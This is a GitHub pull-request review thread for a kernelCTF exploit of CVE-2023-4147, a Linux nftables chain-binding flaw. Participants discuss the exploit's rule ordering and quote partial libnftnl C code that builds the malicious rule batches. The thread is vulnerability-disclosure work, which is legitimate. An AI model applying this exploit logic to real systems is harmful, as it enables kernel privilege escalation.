Add kernelCTF CVE-2023-4147_mitigation #111
base: master
Conversation
memset(rule_data, 'b', 0x100); | ||
nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_TABLE, table2_name); | ||
nftnl_rule_set_str(rules_victim2[i], NFTNL_RULE_CHAIN, chain_victim2_name); |
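Review bot: the two nftnl_rule_set_str calls on rules_victim2[i] in this hunk discard their return value, so a failed attribute set would silently produce a rule whose NEWRULE payload lacks the table or chain name; checking for a non-zero return (or at least asserting on it) would make the loop fail loudly instead of emitting a malformed batch.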
How do we add rule to the chain with NFT_CHAIN_BINDING flag without using chain ID (like in vulnerability) or like in rule_lookup_set1 and chain2_name?
We can add a rule to the chain with NFT_CHAIN_BINDING set before it is bound by an immediate expr.
Ok. Does that mean that on lines 279 - 300:

```c
struct nftnl_rule * rule_bind_chain_1_2 = nftnl_rule_alloc();
nftnl_rule_set_str(rule_bind_chain_1_2, NFTNL_RULE_TABLE, table1_name);
nftnl_rule_set_str(rule_bind_chain_1_2, NFTNL_RULE_CHAIN, chain1_name);
struct nftnl_expr * expr_immediate = nftnl_expr_alloc("immediate");
nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_DREG, NFT_REG_VERDICT);
nftnl_expr_set_u32(expr_immediate, NFTNL_EXPR_IMM_VERDICT, NFT_GOTO);
nftnl_expr_set_str(expr_immediate, NFTNL_EXPR_IMM_CHAIN, chain2_name);
nftnl_rule_add_expr(rule_bind_chain_1_2, expr_immediate);
struct nftnl_rule * rule_lookup_set1 = nftnl_rule_alloc();
nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_TABLE, table1_name);
// nftnl_rule_set_str(rule_lookup_set1, NFTNL_RULE_CHAIN, chain2_name);
nftnl_rule_set_u32(rule_lookup_set1, NFTNL_RULE_CHAIN_ID, chain_id);
struct nftnl_expr * expr_lookup = nftnl_expr_alloc("lookup");
nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SREG, NFT_REG32_00);
nftnl_expr_set_str(expr_lookup, NFTNL_EXPR_LOOKUP_SET, set1_name);
nftnl_expr_set_u32(expr_lookup, NFTNL_EXPR_LOOKUP_SET_ID, 1337);
nftnl_rule_add_expr(rule_lookup_set1, expr_lookup);
```

and lines 561 - 567:

```c
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_bind_chain_1_2);
mnl_nlmsg_batch_next(batch);
nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
nftnl_rule_nlmsg_build_payload(nlh, rule_lookup_set1);
mnl_nlmsg_batch_next(batch);
```

we could change the logic of the exploit to first add the rule_lookup_set1 to chain2_name and then add the expr_immediate to actually bind the chain? Based on your previous comment it seems like this would allow us to skip adding by ID and use the name instead. I see that there is a commented line there which attempts to do the same thing that I just described... If it's not possible, could you explain why?
As you said, I think we can add a rule using the name by changing the order of the rules.
Compare b2e2b9f to 43a5a81
@@ -0,0 +1,12 @@ | |||
- Requirements: | |||
- Capabilites: CAP_NET_ADMIN |
I see that some of the comments from PR#112 could be applied to PR#111, as the COS and Mitigation exploits are similar. For example, here there is a small nitpick on "Capabilites" --> "Capabilities". Could you check the recommendations on PR#112 and synchronise the changes between PR#112 and PR#111, please?
No description provided.